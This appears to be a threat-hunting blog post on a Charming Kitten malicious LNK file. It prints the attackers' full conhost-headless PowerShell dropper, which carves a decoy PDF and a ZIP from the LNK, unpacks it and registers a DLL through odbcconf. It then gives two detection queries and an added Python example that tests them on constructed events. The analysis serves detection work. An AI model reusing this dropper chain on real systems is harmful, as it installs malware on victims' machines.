128. Hunting for Charming Kitten
Hello everyone!
I rarely see adversaries use malicious documents nowadays. But I see LNK files more and more often! Today we'll look at another example, which belongs to Charming Kitten (we track this activity cluster as Cypress Werewolf).
So, the malicious LNK file distributed by the threat actors contained the following command:
conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='osf.zip';$pd='Arda.pdf';$pdl='Arda.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr Wow`} ;
Yes, it's really juicy from a detection and hunting perspective. For example, it abuses conhost.exe with the --headless argument to run the script. That's a good candidate for hunting, but it requires some tuning to remove related legitimate activity, of course:
event_type: "processcreatewin"
AND
proc_file_name: "conhost.exe"
AND
cmdline: "headless"
Another interesting detection opportunity is the abuse of odbcconf.exe to run regsvr32.exe in order to register a malicious DLL:
event_type: "processcreatewin"
AND
proc_file_name: "odbcconf.exe"
AND
cmdline: "regsvr"
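To show how the two hunting queries above behave against real telemetry, here is an added example (not code from the original post): both rules expressed as Python predicates and run over a handful of constructed process-creation events, plus an allowlist hook for the tuning step the conhost.exe rule needs. The field names event_type, proc_file_name and cmdline come from the queries; parent_file_name, the allowlist and every sample event are assumptions made for illustration.

```python
from dataclasses import dataclass, field

@dataclass(frozen=True)
class Rule:
    name: str
    proc_file_name: str       # image name to match, compared case-insensitively
    cmdline_substring: str    # substring of the command line to look for
    # Parent images treated as known-legitimate and tuned out (assumption).
    parent_allowlist: frozenset = field(default_factory=frozenset)

    def matches(self, event: dict) -> bool:
        if event.get("event_type") != "processcreatewin":
            return False
        if event.get("proc_file_name", "").lower() != self.proc_file_name:
            return False
        if self.cmdline_substring not in event.get("cmdline", "").lower():
            return False
        # Tuning hook: suppress hits whose parent is allowlisted.
        if event.get("parent_file_name", "").lower() in self.parent_allowlist:
            return False
        return True

    def with_allowlist(self, parents) -> "Rule":
        """Return a copy of the rule with extra parent images tuned out."""
        return Rule(self.name, self.proc_file_name, self.cmdline_substring,
                    self.parent_allowlist | frozenset(p.lower() for p in parents))

# The two hunting rules from the post: conhost --headless and odbcconf /a {regsvr ...}.
RULES = [
    Rule("conhost_headless", "conhost.exe", "headless"),
    Rule("odbcconf_regsvr", "odbcconf.exe", "regsvr"),
]

# Constructed sample telemetry (not real logs). Command lines are abbreviated.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "conhost.exe",
     "parent_file_name": "explorer.exe",
     "cmdline": "conhost --headless cmd /c FOR /F \"delims=s\\ tokens=4\" %f IN ('set^|findstr PSM') DO ..."},
    {"event_type": "processcreatewin", "proc_file_name": "conhost.exe",
     "parent_file_name": "cmd.exe",
     "cmdline": "\\??\\C:\\Windows\\system32\\conhost.exe 0x4"},   # ordinary console host
    {"event_type": "processcreatewin", "proc_file_name": "odbcconf.exe",
     "parent_file_name": "cmd.exe",
     "cmdline": "odbcconf /a {regsvr Wow}"},
    {"event_type": "processcreatewin", "proc_file_name": "regsvr32.exe",
     "parent_file_name": "odbcconf.exe",
     "cmdline": "regsvr32 /s Wow"},                                  # child, not covered by these rules
    {"event_type": "processcreatewin", "proc_file_name": "conhost.exe",
     "parent_file_name": "buildagent.exe",                           # assumed-legitimate automation
     "cmdline": "conhost --headless build.cmd"},
]

def hunt(events, rules=RULES):
    """Run every rule over every event; return (rule, image, cmdline) for each hit."""
    hits = []
    for ev in events:
        for rule in rules:
            if rule.matches(ev):
                hits.append((rule.name, ev["proc_file_name"], ev["cmdline"]))
    return hits

def tuned_rules(allowed_conhost_parents):
    """Apply the tuning step to the conhost rule only; odbcconf stays untouched."""
    return [r.with_allowlist(allowed_conhost_parents) if r.name == "conhost_headless" else r
            for r in RULES]

if __name__ == "__main__":
    print("untuned:")
    for h in hunt(SAMPLE_EVENTS):
        print("  ", h)
    print("tuned (buildagent.exe allowlisted):")
    for h in hunt(SAMPLE_EVENTS, tuned_rules(["buildagent.exe"])):
        print("  ", h)
```

Untuned, the conhost rule fires on both --headless launches and the odbcconf rule on the regsvr invocation, while the plain console host and the regsvr32 child are ignored. Allowlisting a parent image drops the assumed-legitimate hit without touching the odbcconf rule, which in this sample produced no noise and needs no tuning.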
Which parts of the script seemed interesting to you?
See you tomorrow!